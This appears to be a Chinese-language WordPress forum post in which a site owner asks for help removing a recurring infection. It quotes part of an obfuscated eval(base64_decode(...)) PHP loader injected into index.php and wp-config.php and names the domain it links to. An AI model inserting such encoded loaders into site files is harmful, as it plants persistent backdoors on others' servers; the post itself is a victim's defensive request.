• 访问网站时,会看到有到v-kad.com的数据链接,index.php,或者wp-config.php,wp-setting,wp-setting.php会被修改添加eval(base64_decode(“aWYgKCFkZWZpbmVkKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JykpCnsKZGVmaW5lKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JywgMSk7CgogJHRjc2hqd3hjID0gMjE1OyBmdW5jdGlvbiBhand3dHBwZmcoJHhpZm9pc2EsICRkaHVzZHNsYil7JHVjbWRqYXNlbiA9ICcnOyBmb3IoJGk9MDsgJGkgPCBzdHJsZW4oJHhpZm9pc2EpOyAkaSsrKXskdWNtZGphc2VuIC49IGlzc2V0KCRkaHVzZHNs…..);
    这样加密后的PHP代码,还会建立子目录。
    我把文件中所有这种代码清理掉,目录删除,过一阵子又会出来文件被修改,目录又被建立。
    FTP密码,数据库密码都已经修改过了,文件照样被修改,加入代码,目录还是会被创建。

    大家有没有见过这样的手法,能否协助我清除此黑客行为。

查看 6 回复 - 1 至 6 (总计 6)
查看 6 回复 - 1 至 6 (总计 6)
  • 话题 ‘网站被黑,无法清除,求助’不再接受新回复。